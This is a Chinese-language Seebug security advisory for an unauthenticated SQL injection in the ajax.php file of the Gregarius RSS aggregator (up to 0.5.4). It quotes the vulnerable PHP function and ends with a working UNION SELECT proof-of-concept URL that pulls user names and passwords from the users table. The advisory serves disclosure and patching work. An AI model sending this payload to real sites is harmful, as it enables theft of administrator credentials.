Gregarius ajax.php文件SQL注入漏洞

2008-07-31T00:00:00
ID SSV:3743
Type seebug
Reporter Root
Modified 2008-07-31T00:00:00

Description

BUGTRAQ ID: 30423

Gregarius是基于php的RSS聚合器,可以将所设定的源聚合在一起,以HTML或者XML方式输出。

Gregarius的/ajax.php文件中存在多个SQL注入漏洞,允许远程攻击者无需认证便可获得管理凭据。以下是有漏洞的代码段:

function __exp__getFeedContent($cid) { ob_start(); rss_require('cls/items.php');

$readItems = new ItemList();

$readItems -> populate(" not(i.unread & ". RSS_MODE_UNREAD_STATE  .")
and i.cid= $cid", "", 0, 2, ITEM_SORT_HINT_READ);
$readItems -> setTitle(LBL_H2_RECENT_ITEMS);
$readItems -> setRenderOptions(IL_TITLE_NO_ESCAPE);
foreach ($readItems -> feeds[0] -> items as $item) {
    $item -> render();
}
$c = ob_get_contents();

ob_end_clean();
return "$cid|@|$c";

}

sajax_handle_client_request()调用上面的函数并允许攻击者通过rsargs[]数组指定$cid的内容,因此无论magic_quotes_gps设置如何都可以影响查询。

Marco Bonetti Gregarius <= 0.5.4 James Bercegay (<a href=mailto:security@gulftech.org target=_blank>security@gulftech.org</a>)

<a href=http://marc.info/?l=bugtraq&m=121734846209080&w=2 target=_blank>http://marc.info/?l=bugtraq&m=121734846209080&w=2</a> <a href=http://secunia.com/advisories/31260/ target=_blank>http://secunia.com/advisories/31260/</a>

                                        
                                            
                                                http://www.example.com/ajax.php?rs=__exp__getFeedContent&amp;amp;rsargs[]=-99 UNION SELECT concat(char(58),uname,char(58),password),2,3,4,5,6,7,8,9,0,1,2,3 FROM users/*